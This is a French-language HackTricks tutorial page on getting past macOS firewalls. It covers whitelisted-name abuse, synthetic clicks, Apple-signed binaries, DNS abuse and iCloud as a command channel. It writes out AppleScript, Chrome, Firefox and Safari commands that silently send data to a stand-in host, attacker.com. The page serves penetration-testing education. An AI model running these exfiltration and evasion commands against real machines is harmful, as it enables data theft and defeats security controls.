hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md

4.7 KiB

Contournement des pare-feu macOS

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Techniques trouvées

Les techniques suivantes ont été trouvées fonctionnant dans certaines applications pare-feu macOS.

Abus des noms de liste blanche

  • Par exemple, appeler le logiciel malveillant avec des noms de processus macOS bien connus comme launchd

Clic synthétique

  • Si le pare-feu demande la permission à l'utilisateur, faire en sorte que le logiciel malveillant clique sur Autoriser

Utiliser des binaires signés par Apple

  • Comme curl, mais aussi d'autres comme whois

Domaines Apple bien connus

Le pare-feu pourrait autoriser les connexions vers des domaines Apple bien connus tels que apple.com ou icloud.com. Et iCloud pourrait être utilisé comme un C2.

Contournement générique

Quelques idées pour essayer de contourner les pare-feu

Vérifier le trafic autorisé

Connaître le trafic autorisé vous aidera à identifier les domaines potentiellement en liste blanche ou les applications autorisées à y accéder

lsof -i TCP -sTCP:ESTABLISHED

Abus du DNS

Les résolutions DNS sont effectuées via l'application signée mdnsreponder qui sera probablement autorisée à contacter les serveurs DNS.

https://www.youtube.com/watch?v=UlT5KFTMn2k

Via les applications du navigateur

  • oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
  • Google Chrome

{% code overflow="wrap" %}

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

{% endcode %}

  • Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
  • Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Via injections de processus

Si vous pouvez injecter du code dans un processus autorisé à se connecter à n'importe quel serveur, vous pourriez contourner les protections du pare-feu :

{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

Références

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge HackTricks AWS)!

Autres façons de soutenir HackTricks :